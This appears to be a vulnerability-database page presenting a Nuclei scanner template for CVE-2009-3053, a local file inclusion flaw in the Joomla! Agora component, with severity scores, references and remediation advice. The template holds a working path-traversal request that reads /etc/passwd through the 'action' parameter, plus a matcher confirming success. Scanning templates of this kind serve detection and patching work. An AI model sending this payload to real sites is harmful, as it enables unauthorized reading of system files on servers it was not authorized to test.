Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2009-3053
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Agora 3.0.0b - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
1

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

76.7%

Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.

id: CVE-2009-3053

info:
  name: Joomla! Agora 3.0.0b  - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/9564
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
    - https://nvd.nist.gov/vuln/detail/CVE-2009-3053
    - http://www.exploit-db.com/exploits/9564
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2009-3053
    cwe-id: CWE-22
    epss-score: 0.00447
    epss-percentile: 0.74489
    cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomla
    product: joomla
  tags: cve2009,cve,joomla,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b1484271cee40bf0b4aea6f4d71ca3af8dbc80c595ae0ac214b2c4a50f9e208d02206d398d3a43e76b1fe42dd939684c2051143435d1f0dabe2491f7e7e9cf780c28:922c64590222798bb761d5b6d8e72950

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

76.7%

Related for NUCLEI:CVE-2009-3053